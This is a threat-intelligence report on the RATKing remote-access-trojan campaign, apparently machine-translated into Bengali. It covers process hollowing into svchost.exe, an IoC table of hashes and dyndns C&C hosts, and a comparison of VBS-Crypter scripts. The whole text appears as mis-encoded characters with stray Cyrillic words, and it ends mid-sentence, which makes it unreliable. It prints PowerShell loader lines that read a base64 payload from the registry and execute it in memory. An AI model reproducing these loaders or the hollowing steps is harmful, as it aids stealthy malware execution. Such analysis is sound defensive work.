āĻĢāĻ˛āĻ¸ā§āĻŦāĻ°ā§‚āĻĒ, āĻ†āĻŽāĻ°āĻž āĻ–ā§āĻāĻœā§‡ āĻĒā§‡āĻ¯āĻŧā§‡āĻ›āĻŋ āĻ¯ā§‡:

  • array āĻāĻ•āĻŸāĻŋ PE āĻĢāĻžāĻ‡āĻ˛ āĻ›āĻŋāĻ˛ - āĻāĻŸāĻŋ āĻšā§‚āĻĄāĻŧāĻžāĻ¨ā§āĻ¤ āĻĒā§‡āĻ˛ā§‹āĻĄ;
  • array2 āĻ‡āĻ¨āĻœā§‡āĻ•āĻļāĻ¨ āĻšāĻžāĻ˛āĻžāĻ¨ā§‹āĻ° āĻœāĻ¨ā§āĻ¯ āĻĒā§āĻ°āĻ¯āĻŧā§‹āĻœāĻ¨ā§€āĻ¯āĻŧ āĻļā§‡āĻ˛āĻ•ā§‹āĻĄ āĻ›āĻŋāĻ˛āĨ¤

āĻāĻ•āĻŸāĻŋ āĻ…ā§āĻ¯āĻžāĻ°ā§‡ āĻĨā§‡āĻ•ā§‡ āĻļā§‡āĻ˛āĻ•ā§‹āĻĄ array2 āĻāĻ•āĻŸāĻŋ āĻĢāĻžāĻ‚āĻļāĻ¨ āĻŽāĻžāĻ¨ āĻšāĻŋāĻ¸āĻžāĻŦā§‡ āĻĒāĻžāĻ¸ lpPrevWndFunc āĻāĻ•āĻŸāĻŋ āĻĢāĻžāĻ‚āĻļāĻ¨ āĻŽāĻ§ā§āĻ¯ā§‡ CallWindowProcA. lpPrevWndFunc - āĻ•āĻ˛āĻŦā§āĻ¯āĻžāĻ• āĻĢāĻžāĻ‚āĻļāĻ¨, āĻāĻ° āĻĒā§āĻ°ā§‹āĻŸā§‹āĻŸāĻžāĻ‡āĻĒ āĻĻā§‡āĻ–āĻ¤ā§‡ āĻāĻ‡āĻ°āĻ•āĻŽ:

LRESULT WndFunc(
  HWND    hWnd,
  UINT    Msg,
  WPARAM  wParam,
  LPARAM  lParam
);

āĻ¤āĻžāĻ‡ āĻ†āĻĒāĻ¨āĻŋ āĻ¯āĻ–āĻ¨ āĻĢāĻžāĻ‚āĻļāĻ¨ āĻ°āĻžāĻ¨ CallWindowProcA āĻĒāĻ°āĻžāĻŽāĻŋāĻ¤āĻŋ āĻ¸āĻš hWnd, Msg, wParam, lParam āĻ…ā§āĻ¯āĻžāĻ°ā§‡ āĻĨā§‡āĻ•ā§‡ āĻļā§‡āĻ˛āĻ•ā§‹āĻĄ āĻ•āĻžāĻ°ā§āĻ¯āĻ•āĻ° āĻ•āĻ°āĻž āĻšāĻ¯āĻŧ array2 āĻ¯ā§āĻ•ā§āĻ¤āĻŋ āĻ¸āĻš hWnd и Msg. hWnd āĻāĻ•ā§āĻ¸āĻŋāĻ•āĻŋāĻ‰āĻŸā§‡āĻŦāĻ˛ āĻĢāĻžāĻ‡āĻ˛ā§‡āĻ° āĻĒāĻžāĻĨ āĻ§āĻžāĻ°āĻŖāĻ•āĻžāĻ°ā§€ āĻāĻ•āĻŸāĻŋ āĻ¸ā§āĻŸā§āĻ°āĻŋāĻ‚ āĻāĻ° āĻāĻ•āĻŸāĻŋ āĻĒāĻ¯āĻŧā§‡āĻ¨ā§āĻŸāĻžāĻ° svchost.exeāĻāĻŦāĻ‚ Msg - āĻšā§‚āĻĄāĻŧāĻžāĻ¨ā§āĻ¤ āĻĒā§‡āĻ˛ā§‹āĻĄā§‡āĻ° āĻĻāĻŋāĻ•ā§‡ āĻ¨āĻŋāĻ°ā§āĻĻā§‡āĻļāĻ•āĨ¤

āĻļā§‡āĻ˛āĻ•ā§‹āĻĄ āĻĨā§‡āĻ•ā§‡ āĻĢāĻžāĻ‚āĻļāĻ¨ āĻ āĻŋāĻ•āĻžāĻ¨āĻž āĻĒā§‡āĻ¯āĻŧā§‡āĻ›ā§‡ kernel32.dll Đ¸ ntdll32.dll āĻ¤āĻžāĻĻā§‡āĻ° āĻ¨āĻžāĻŽ āĻĨā§‡āĻ•ā§‡ āĻšā§āĻ¯āĻžāĻļ āĻŽāĻžāĻ¨ā§‡āĻ° āĻ‰āĻĒāĻ° āĻ­āĻŋāĻ¤ā§āĻ¤āĻŋ āĻ•āĻ°ā§‡ āĻāĻŦāĻ‚ āĻĒā§āĻ°āĻ•ā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻŽā§‡āĻŽāĻ°āĻŋāĻ¤ā§‡ āĻšā§‚āĻĄāĻŧāĻžāĻ¨ā§āĻ¤ āĻĒā§‡āĻ˛ā§‹āĻĄ āĻ‡āĻ¨āĻœā§‡āĻ•āĻļāĻ¨ āĻ•āĻ°ā§‡ svchost.exeāĻĒā§āĻ°āĻ¸ā§‡āĻ¸ āĻšā§‹āĻ˛ā§‹āĻ¯āĻŧāĻŋāĻ‚ āĻ•ā§ŒāĻļāĻ˛ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡ (āĻ†āĻĒāĻ¨āĻŋ āĻāĻŸāĻŋ āĻ¸āĻŽā§āĻĒāĻ°ā§āĻ•ā§‡ āĻ†āĻ°āĻ“ āĻĒāĻĄāĻŧāĻ¤ā§‡ āĻĒāĻžāĻ°ā§‡āĻ¨ āĻĒā§āĻ°āĻŦāĻ¨ā§āĻ§) āĻļā§‡āĻ˛āĻ•ā§‹āĻĄ āĻ‡āĻ¨āĻœā§‡āĻ•āĻļāĻ¨ āĻ•āĻ°āĻžāĻ° āĻ¸āĻŽāĻ¯āĻŧ:

  • āĻāĻ•āĻŸāĻŋ āĻĒā§āĻ°āĻ•ā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻ¤ā§ˆāĻ°āĻŋ āĻ•āĻ°ā§‡āĻ›ā§‡ svchost.exe āĻĢāĻžāĻ‚āĻļāĻ¨ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡ āĻāĻ•āĻŸāĻŋ āĻ¸ā§āĻĨāĻ—āĻŋāĻ¤ āĻ…āĻŦāĻ¸ā§āĻĨāĻžāĻ¯āĻŧ CreateProcessW;
  • āĻ¤āĻžāĻ°āĻĒāĻ° āĻĒā§āĻ°āĻ•ā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻ° āĻ āĻŋāĻ•āĻžāĻ¨āĻž āĻ¸ā§āĻĨāĻžāĻ¨ā§‡ āĻŦāĻŋāĻ­āĻžāĻ—ā§‡āĻ° āĻĒā§āĻ°āĻĻāĻ°ā§āĻļāĻ¨ āĻ˛ā§āĻ•āĻŋāĻ¯āĻŧā§‡ āĻ°āĻžāĻ–ā§āĻ¨ svchost.exe āĻĢāĻžāĻ‚āĻļāĻ¨ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡ NtUnmapViewOfSection. āĻāĻ‡āĻ­āĻžāĻŦā§‡, āĻĒā§āĻ°ā§‹āĻ—ā§āĻ°āĻžāĻŽāĻŸāĻŋ āĻŽā§‚āĻ˛ āĻĒā§āĻ°āĻ•ā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻŸāĻŋāĻ° āĻ¸ā§āĻŽā§ƒāĻ¤āĻŋāĻ•ā§‡ āĻŽā§āĻ•ā§āĻ¤ āĻ•āĻ°ā§‡ svchost.exeāĻ¤āĻžāĻ°āĻĒāĻ° āĻāĻ‡ āĻ āĻŋāĻ•āĻžāĻ¨āĻžāĻ¯āĻŧ āĻĒā§‡āĻ˛ā§‹āĻĄā§‡āĻ° āĻœāĻ¨ā§āĻ¯ āĻŽā§‡āĻŽāĻ°āĻŋ āĻŦāĻ°āĻžāĻĻā§āĻĻ āĻ•āĻ°āĻ¤ā§‡;
  • āĻĒā§āĻ°āĻ¸ā§‡āĻ¸ āĻ…ā§āĻ¯āĻžāĻĄā§āĻ°ā§‡āĻ¸ āĻ¸ā§āĻĒā§‡āĻ¸ā§‡ āĻĒā§‡āĻ˛ā§‹āĻĄā§‡āĻ° āĻœāĻ¨ā§āĻ¯ āĻŽā§‡āĻŽāĻ°āĻŋ āĻŦāĻ°āĻžāĻĻā§āĻĻ āĻ•āĻ°āĻž āĻšāĻ¯āĻŧā§‡āĻ›ā§‡ svchost.exe āĻĢāĻžāĻ‚āĻļāĻ¨ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡ VirtualAllocEx;

RATKing: āĻ¨āĻ¤ā§āĻ¨ āĻ°āĻŋāĻŽā§‹āĻŸ āĻ…ā§āĻ¯āĻžāĻ•ā§āĻ¸ā§‡āĻ¸ āĻŸā§āĻ°ā§‹āĻœāĻžāĻ¨ āĻ•ā§āĻ¯āĻžāĻŽā§āĻĒā§‡āĻ‡āĻ¨
āĻ‡āĻ¨āĻœā§‡āĻ•āĻļāĻ¨ āĻĒā§āĻ°āĻ•ā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻļā§āĻ°ā§

  • āĻĒā§āĻ°āĻ¸ā§‡āĻ¸ āĻ…ā§āĻ¯āĻžāĻĄā§āĻ°ā§‡āĻ¸ āĻ¸ā§āĻĒā§‡āĻ¸ā§‡ āĻĒā§‡āĻ˛ā§‹āĻĄā§‡āĻ° āĻŦāĻŋāĻˇāĻ¯āĻŧāĻŦāĻ¸ā§āĻ¤ā§ āĻ˛āĻŋāĻ–ā§‡āĻ›ā§‡ svchost.exe āĻĢāĻžāĻ‚āĻļāĻ¨ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡ WriteProcessMemory (āĻ¨ā§€āĻšā§‡āĻ° āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻ¨āĻļāĻŸā§‡āĻ° āĻŽāĻ¤ā§‹);
  • āĻĒā§āĻ°āĻ•ā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻĒā§āĻ¨āĻ°āĻžāĻ¯āĻŧ āĻļā§āĻ°ā§ svchost.exe āĻĢāĻžāĻ‚āĻļāĻ¨ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡ ResumeThread.

RATKing: āĻ¨āĻ¤ā§āĻ¨ āĻ°āĻŋāĻŽā§‹āĻŸ āĻ…ā§āĻ¯āĻžāĻ•ā§āĻ¸ā§‡āĻ¸ āĻŸā§āĻ°ā§‹āĻœāĻžāĻ¨ āĻ•ā§āĻ¯āĻžāĻŽā§āĻĒā§‡āĻ‡āĻ¨
āĻ‡āĻ¨āĻœā§‡āĻ•āĻļāĻ¨ āĻĒā§āĻ°āĻ•ā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻ¸āĻŽā§āĻĒāĻ¨ā§āĻ¨ āĻ•āĻ°āĻž

āĻĄāĻžāĻ‰āĻ¨āĻ˛ā§‹āĻĄāĻ¯ā§‹āĻ—ā§āĻ¯ āĻŽā§āĻ¯āĻžāĻ˛āĻ“āĻ¯āĻŧā§āĻ¯āĻžāĻ°

āĻŦāĻ°ā§āĻŖāĻŋāĻ¤ āĻ•āĻ°ā§āĻŽā§‡āĻ° āĻĢāĻ˛āĻ¸ā§āĻŦāĻ°ā§‚āĻĒ, āĻ¸āĻ‚āĻ•ā§āĻ°āĻžāĻŽāĻŋāĻ¤ āĻ¸āĻŋāĻ¸ā§āĻŸā§‡āĻŽā§‡ āĻŦā§‡āĻļ āĻ•āĻ¯āĻŧā§‡āĻ•āĻŸāĻŋ RAT-āĻļā§āĻ°ā§‡āĻŖā§€āĻ° āĻŽā§āĻ¯āĻžāĻ˛āĻ“āĻ¯āĻŧā§āĻ¯āĻžāĻ° āĻ‡āĻ¨āĻ¸ā§āĻŸāĻ˛ āĻ•āĻ°āĻž āĻšāĻ¯āĻŧā§‡āĻ›āĻŋāĻ˛āĨ¤ āĻ¨ā§€āĻšā§‡āĻ° āĻ¸āĻžāĻ°āĻŖā§€ āĻ†āĻ•ā§āĻ°āĻŽāĻŖā§‡ āĻŦā§āĻ¯āĻŦāĻšā§ƒāĻ¤ āĻŽā§āĻ¯āĻžāĻ˛āĻ“āĻ¯āĻŧā§āĻ¯āĻžāĻ° āĻ¤āĻžāĻ˛āĻŋāĻ•āĻžāĻ­ā§āĻ•ā§āĻ¤ āĻ•āĻ°ā§‡, āĻ¯āĻž āĻ†āĻŽāĻ°āĻž āĻ†āĻ¤ā§āĻŽāĻŦāĻŋāĻļā§āĻŦāĻžāĻ¸ā§‡āĻ° āĻ¸āĻžāĻĨā§‡ āĻ†āĻ•ā§āĻ°āĻŽāĻŖāĻ•āĻžāĻ°ā§€āĻĻā§‡āĻ° āĻāĻ•āĻŸāĻŋ āĻ—ā§āĻ°ā§āĻĒāĻ•ā§‡ āĻĻāĻžāĻ¯āĻŧā§€ āĻ•āĻ°āĻ¤ā§‡ āĻĒāĻžāĻ°āĻŋ, āĻ¯ā§‡āĻšā§‡āĻ¤ā§ āĻ¨āĻŽā§āĻ¨āĻžāĻ—ā§āĻ˛āĻŋ āĻāĻ•āĻ‡ āĻ•āĻŽāĻžāĻ¨ā§āĻĄ āĻāĻŦāĻ‚ āĻ¨āĻŋāĻ¯āĻŧāĻ¨ā§āĻ¤ā§āĻ°āĻŖ āĻ¸āĻžāĻ°ā§āĻ­āĻžāĻ°ā§‡ āĻ…ā§āĻ¯āĻžāĻ•ā§āĻ¸ā§‡āĻ¸ āĻ•āĻ°ā§‡āĻ›ā§‡ā§ˇ

āĻŽā§āĻ¯āĻžāĻ˛āĻ“āĻ¯āĻŧāĻžāĻ°ā§‡āĻ° āĻ¨āĻžāĻŽ

āĻĒā§āĻ°āĻĨāĻŽ āĻ˛āĻ•ā§āĻˇā§āĻ¯ āĻ•āĻ°āĻž āĻ¯āĻžāĻ¯āĻŧ

āĻ°āĻ¯āĻŧā§‡āĻ›ā§‡ SHA-256

āĻ¸āĻŋāĻāĻ¨ā§āĻĄāĻ¸āĻŋ

āĻ¯ā§‡ āĻĒā§āĻ°āĻ•ā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻ¯āĻŧ āĻ‡āĻ¨āĻœā§‡āĻ•āĻļāĻ¨ āĻŦāĻžāĻšāĻŋāĻ¤ āĻšāĻ¯āĻŧ

āĻĄāĻžāĻ°ā§āĻ•āĻŸā§āĻ°ā§āĻ¯āĻžāĻ•

16-04-2020

ea64fe672c953adc19553ea3b9118ce4ee88a14d92fc7e75aa04972848472702

kimjoy007.dyndns[.]org:2017

svchost

āĻ˛āĻŽā§āĻŦāĻ¨

24-04-2020

b4ecd8dbbceaadd482f1b23b712bcddc5464bccaac11fe78ea5fd0ba932a4043

kimjoy007.dyndns[.]org:2019

svchost

āĻ¸āĻ¤āĻ°ā§āĻ•āĻ¤āĻž

18-05-2020

3786324ce3f8c1ea3784e5389f84234f81828658b22b8a502b7d48866f5aa3d3

kimjoy007.dyndns[.]org:9933

svchost

āĻ¨ā§‡āĻŸāĻ“āĻ¯āĻŧā§āĻ¯āĻžāĻ°

20-05-2020

6dac218f741b022f5cad3b5ee01dbda80693f7045b42a0c70335d8a729002f2d

kimjoy007.dyndns[.]org:2000

svchost

āĻāĻ•āĻ‡ āĻ¨āĻŋāĻ¯āĻŧāĻ¨ā§āĻ¤ā§āĻ°āĻŖ āĻ¸āĻžāĻ°ā§āĻ­āĻžāĻ°ā§‡āĻ° āĻ¸āĻžāĻĨā§‡ āĻŦāĻŋāĻ¤āĻ°āĻŖāĻ•ā§ƒāĻ¤ āĻŽā§āĻ¯āĻžāĻ˛āĻ“āĻ¯āĻŧāĻžāĻ°ā§‡āĻ° āĻ‰āĻĻāĻžāĻšāĻ°āĻŖ

āĻāĻ–āĻžāĻ¨ā§‡ āĻĻā§āĻŸāĻŋ āĻŦāĻŋāĻˇāĻ¯āĻŧ āĻ˛āĻ•ā§āĻˇāĻŖā§€āĻ¯āĻŧāĨ¤

āĻĒā§āĻ°āĻĨāĻŽāĻ¤, āĻ†āĻ•ā§āĻ°āĻŽāĻŖāĻ•āĻžāĻ°ā§€āĻ°āĻž āĻāĻ•āĻ¯ā§‹āĻ—ā§‡ āĻŦāĻŋāĻ­āĻŋāĻ¨ā§āĻ¨ RAT āĻĒāĻ°āĻŋāĻŦāĻžāĻ° āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡āĻ›āĻŋāĻ˛āĨ¤ āĻāĻ‡ āĻ†āĻšāĻ°āĻŖāĻŸāĻŋ āĻ¸ā§āĻĒāĻ°āĻŋāĻšāĻŋāĻ¤ āĻ¸āĻžāĻ‡āĻŦāĻžāĻ° āĻ—ā§‹āĻˇā§āĻ ā§€āĻ—ā§āĻ˛āĻŋāĻ° āĻœāĻ¨ā§āĻ¯ āĻ¸āĻžāĻ§āĻžāĻ°āĻŖ āĻ¨āĻ¯āĻŧ, āĻ¯āĻžāĻ°āĻž āĻĒā§āĻ°āĻžāĻ¯āĻŧāĻļāĻ‡ āĻ¤āĻžāĻĻā§‡āĻ° āĻĒāĻ°āĻŋāĻšāĻŋāĻ¤ āĻŸā§āĻ˛āĻ—ā§āĻ˛āĻŋāĻ° āĻĒā§āĻ°āĻžāĻ¯āĻŧ āĻāĻ•āĻ‡ āĻ¸ā§‡āĻŸ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡āĨ¤

āĻĻā§āĻŦāĻŋāĻ¤ā§€āĻ¯āĻŧāĻ¤, RATKing āĻŽā§āĻ¯āĻžāĻ˛āĻ“āĻ¯āĻŧā§āĻ¯āĻžāĻ° āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡āĻ›ā§‡ āĻ¯āĻž āĻšāĻ¯āĻŧ āĻŦāĻŋāĻļā§‡āĻˇ āĻĢā§‹āĻ°āĻžāĻŽā§‡ āĻ•āĻŽ āĻĻāĻžāĻŽā§‡ āĻŦāĻŋāĻ•ā§āĻ°āĻŋ āĻšāĻ¯āĻŧ, āĻ…āĻĨāĻŦāĻž āĻāĻŽāĻ¨āĻ•āĻŋ āĻāĻ•āĻŸāĻŋ āĻ“āĻĒā§‡āĻ¨ āĻ¸ā§‹āĻ°ā§āĻ¸ āĻĒā§āĻ°āĻœā§‡āĻ•ā§āĻŸāĨ¤

āĻĒā§āĻ°āĻšāĻžāĻ°āĻžāĻ­āĻŋāĻ¯āĻžāĻ¨ā§‡ āĻŦā§āĻ¯āĻŦāĻšā§ƒāĻ¤ āĻŽā§āĻ¯āĻžāĻ˛āĻ“āĻ¯āĻŧā§āĻ¯āĻžāĻ°ā§‡āĻ° āĻ†āĻ°āĻ“ āĻ¸āĻŽā§āĻĒā§‚āĻ°ā§āĻŖ āĻ¤āĻžāĻ˛āĻŋāĻ•āĻž - āĻāĻ•āĻŸāĻŋ āĻ—ā§āĻ°ā§āĻ¤ā§āĻŦāĻĒā§‚āĻ°ā§āĻŖ āĻ¸āĻ¤āĻ°ā§āĻ•āĻ¤āĻž āĻ¸āĻš - āĻ¨āĻŋāĻŦāĻ¨ā§āĻ§ā§‡āĻ° āĻļā§‡āĻˇā§‡ āĻĻā§‡āĻ“āĻ¯āĻŧāĻž āĻšāĻ¯āĻŧā§‡āĻ›ā§‡ā§ˇ

āĻ—ā§āĻ°ā§āĻĒ āĻ¸āĻŽā§āĻĒāĻ°ā§āĻ•ā§‡

āĻ†āĻŽāĻ°āĻž āĻŦāĻ°ā§āĻŖāĻŋāĻ¤ āĻŦāĻŋāĻĻā§āĻŦā§‡āĻˇāĻĒā§‚āĻ°ā§āĻŖ āĻĒā§āĻ°āĻšāĻžāĻ°āĻŖāĻžāĻ•ā§‡ āĻ•ā§‹āĻ¨ā§‹ āĻĒāĻ°āĻŋāĻšāĻŋāĻ¤ āĻ†āĻ•ā§āĻ°āĻŽāĻŖāĻ•āĻžāĻ°ā§€āĻĻā§‡āĻ° āĻĻāĻžāĻ¯āĻŧā§€ āĻ•āĻ°āĻ¤ā§‡ āĻĒāĻžāĻ°āĻŋ āĻ¨āĻžāĨ¤ āĻ†āĻĒāĻžāĻ¤āĻ¤, āĻ†āĻŽāĻ°āĻž āĻŦāĻŋāĻļā§āĻŦāĻžāĻ¸ āĻ•āĻ°āĻŋ āĻ¯ā§‡ āĻāĻ‡ āĻ†āĻ•ā§āĻ°āĻŽāĻŖāĻ—ā§āĻ˛āĻŋ āĻāĻ•āĻŸāĻŋ āĻŽā§ŒāĻ˛āĻŋāĻ•āĻ­āĻžāĻŦā§‡ āĻ¨āĻ¤ā§āĻ¨ āĻ—ā§āĻ°ā§āĻĒ āĻĻā§āĻŦāĻžāĻ°āĻž āĻĒāĻ°āĻŋāĻšāĻžāĻ˛āĻŋāĻ¤ āĻšāĻ¯āĻŧā§‡āĻ›āĻŋāĻ˛āĨ¤ āĻ†āĻŽāĻ°āĻž āĻļā§āĻ°ā§āĻ¤ā§‡ āĻ¯ā§‡āĻŽāĻ¨ āĻ˛āĻŋāĻ–ā§‡āĻ›āĻŋāĻ˛āĻžāĻŽ, āĻ†āĻŽāĻ°āĻž āĻāĻŸāĻŋāĻ•ā§‡ RATKing āĻŦāĻ˛ā§‡āĻ›āĻŋāĨ¤

VBS āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸ āĻ¤ā§ˆāĻ°āĻŋ āĻ•āĻ°āĻ¤ā§‡, āĻ—ā§āĻ°ā§āĻĒāĻŸāĻŋ āĻ¸āĻŽā§āĻ­āĻŦāĻ¤ āĻ‡āĻ‰āĻŸāĻŋāĻ˛āĻŋāĻŸāĻŋāĻ° āĻ…āĻ¨ā§āĻ°ā§‚āĻĒ āĻāĻ•āĻŸāĻŋ āĻŸā§āĻ˛ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡āĻ›ā§‡ āĻ­āĻŋāĻŦāĻŋāĻāĻ¸-āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸāĻžāĻ° āĻŦāĻŋāĻ•āĻžāĻļāĻ•āĻžāĻ°ā§€ āĻĨā§‡āĻ•ā§‡ NYAN-x-CAT. āĻāĻŸāĻŋ āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸā§‡āĻ° āĻ¸āĻžāĻĻā§ƒāĻļā§āĻ¯ āĻĻā§āĻŦāĻžāĻ°āĻž āĻ¨āĻŋāĻ°ā§āĻĻā§‡āĻļāĻŋāĻ¤ āĻšāĻ¯āĻŧ āĻ¯āĻž āĻāĻ‡ āĻĒā§āĻ°ā§‹āĻ—ā§āĻ°āĻžāĻŽāĻŸāĻŋ āĻ†āĻ•ā§āĻ°āĻŽāĻŖāĻ•āĻžāĻ°ā§€āĻĻā§‡āĻ° āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸā§‡āĻ° āĻ¸āĻžāĻĨā§‡ āĻ¤ā§ˆāĻ°āĻŋ āĻ•āĻ°ā§‡āĨ¤ āĻŦāĻŋāĻļā§‡āĻˇ āĻ•āĻ°ā§‡, āĻ¤āĻžāĻ°āĻž āĻ‰āĻ­āĻ¯āĻŧ:

  • āĻĢāĻžāĻ‚āĻļāĻ¨ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡ āĻŦāĻŋāĻ˛āĻŽā§āĻŦāĻŋāĻ¤ āĻ¸āĻžā§āĻšāĻžāĻ˛āĻ¨ āĻ•āĻ°ā§āĻ¨ Sleep;
  • WMI āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§āĻ¨;
  • āĻāĻ•āĻŸāĻŋ āĻ°ā§‡āĻœāĻŋāĻ¸ā§āĻŸā§āĻ°āĻŋ āĻ•ā§€ āĻĒā§āĻ¯āĻžāĻ°āĻžāĻŽāĻŋāĻŸāĻžāĻ° āĻšāĻŋāĻ¸āĻžāĻŦā§‡ āĻāĻ•ā§āĻ¸āĻŋāĻ•āĻŋāĻ‰āĻŸā§‡āĻŦāĻ˛ āĻĢāĻžāĻ‡āĻ˛ā§‡āĻ° āĻŦāĻĄāĻŋ āĻ¨āĻŋāĻŦāĻ¨ā§āĻ§āĻ¨ āĻ•āĻ°ā§āĻ¨;
  • PowerShell āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡ āĻāĻ‡ āĻĢāĻžāĻ‡āĻ˛āĻŸāĻŋ āĻ¤āĻžāĻ° āĻ¨āĻŋāĻœāĻ¸ā§āĻŦ āĻ āĻŋāĻ•āĻžāĻ¨āĻžāĻ° āĻ¸ā§āĻĨāĻžāĻ¨ā§‡ āĻšāĻžāĻ˛āĻžāĻ¨āĨ¤

āĻ¸ā§āĻĒāĻˇā§āĻŸāĻ¤āĻžāĻ° āĻœāĻ¨ā§āĻ¯, āĻ°ā§‡āĻœāĻŋāĻ¸ā§āĻŸā§āĻ°āĻŋ āĻĨā§‡āĻ•ā§‡ āĻāĻ•āĻŸāĻŋ āĻĢāĻžāĻ‡āĻ˛ āĻšāĻžāĻ˛āĻžāĻ¨ā§‹āĻ° āĻœāĻ¨ā§āĻ¯ PowerShell āĻ•āĻŽāĻžāĻ¨ā§āĻĄā§‡āĻ° āĻ¤ā§āĻ˛āĻ¨āĻž āĻ•āĻ°ā§āĻ¨, āĻ¯āĻž VBS-Crypter āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡ āĻ¤ā§ˆāĻ°āĻŋ āĻāĻ•āĻŸāĻŋ āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸ āĻĻā§āĻŦāĻžāĻ°āĻž āĻŦā§āĻ¯āĻŦāĻšā§ƒāĻ¤ āĻšāĻ¯āĻŧ:

((Get-ItemPropertyHKCU:SoftwareNYANxCAT).NYANxCAT);$text=-join$text[-1..-$text.Length];[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String($text)).EntryPoint.Invoke($Null,$Null);

āĻ†āĻ•ā§āĻ°āĻŽāĻŖāĻ•āĻžāĻ°ā§€ āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°āĻž āĻ…āĻ¨ā§āĻ°ā§‚āĻĒ āĻ•āĻŽāĻžāĻ¨ā§āĻĄ āĻ¸āĻš:

[System.Threading.Thread]::GetDomain().Load((ItemProperty HKCU:///Software///<rnd_sub_key_name> ).<rnd_value_name>);
[GUyyvmzVhebFCw]::EhwwK('WScript.ScriptFullName', 'rWZlgEtiZr', 'WScript.ScriptName'),0

āĻ¨ā§‹āĻŸ āĻ•āĻ°ā§āĻ¨ āĻ¯ā§‡ āĻ†āĻ•ā§āĻ°āĻŽāĻŖāĻ•āĻžāĻ°ā§€āĻ°āĻž āĻĒā§‡āĻ˛ā§‹āĻĄāĻ—ā§āĻ˛āĻŋāĻ° āĻŽāĻ§ā§āĻ¯ā§‡ āĻāĻ•āĻŸāĻŋ āĻšāĻŋāĻ¸āĻžāĻŦā§‡ NYAN-x-CAT āĻĨā§‡āĻ•ā§‡ āĻ…āĻ¨ā§āĻ¯ āĻāĻ•āĻŸāĻŋ āĻ‡āĻ‰āĻŸāĻŋāĻ˛āĻŋāĻŸāĻŋ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡āĻ›āĻŋāĻ˛ - LimeRAT.

C&C āĻ¸āĻžāĻ°ā§āĻ­āĻžāĻ°ā§‡āĻ° āĻ āĻŋāĻ•āĻžāĻ¨āĻžāĻ—ā§āĻ˛āĻŋ RATKing-āĻāĻ° āĻ†āĻ°ā§‡āĻ•āĻŸāĻŋ āĻ¸ā§āĻŦāĻ¤āĻ¨ā§āĻ¤ā§āĻ° āĻŦā§ˆāĻļāĻŋāĻˇā§āĻŸā§āĻ¯ āĻ¨āĻŋāĻ°ā§āĻĻā§‡āĻļ āĻ•āĻ°ā§‡: āĻ—ā§āĻ°ā§āĻĒāĻŸāĻŋ āĻ—āĻ¤āĻŋāĻļā§€āĻ˛ DNS āĻĒāĻ°āĻŋāĻˇā§‡āĻŦāĻž āĻĒāĻ›āĻ¨ā§āĻĻ āĻ•āĻ°ā§‡ (IoC āĻŸā§‡āĻŦāĻŋāĻ˛ā§‡ C&C-āĻāĻ° āĻ¤āĻžāĻ˛āĻŋāĻ•āĻž āĻĻā§‡āĻ–ā§āĻ¨)āĨ¤

āĻ†āĻ‡āĻ“āĻ¸āĻŋ

āĻ¨ā§€āĻšā§‡āĻ° āĻŸā§‡āĻŦāĻŋāĻ˛āĻŸāĻŋ VBS āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸāĻ—ā§āĻ˛āĻŋāĻ° āĻāĻ•āĻŸāĻŋ āĻ¸āĻŽā§āĻĒā§‚āĻ°ā§āĻŖ āĻ¤āĻžāĻ˛āĻŋāĻ•āĻž āĻĒā§āĻ°āĻĻāĻžāĻ¨ āĻ•āĻ°ā§‡ āĻ¯āĻž āĻ¸āĻŽā§āĻ­āĻŦāĻ¤ āĻŦāĻ°ā§āĻŖāĻŋāĻ¤ āĻĒā§āĻ°āĻšāĻžāĻ°āĻžāĻ­āĻŋāĻ¯āĻžāĻ¨ā§‡āĻ° āĻœāĻ¨ā§āĻ¯ āĻĻāĻžāĻ¯āĻŧā§€ āĻ•āĻ°āĻž āĻ¯ā§‡āĻ¤ā§‡ āĻĒāĻžāĻ°ā§‡āĨ¤ āĻāĻ‡ āĻ¸āĻŽāĻ¸ā§āĻ¤ āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸ āĻāĻ•āĻ‡ āĻ°āĻ•āĻŽ āĻāĻŦāĻ‚ āĻ•āĻ°ā§āĻŽā§‡āĻ° āĻĒā§āĻ°āĻžāĻ¯āĻŧ āĻāĻ•āĻ‡ 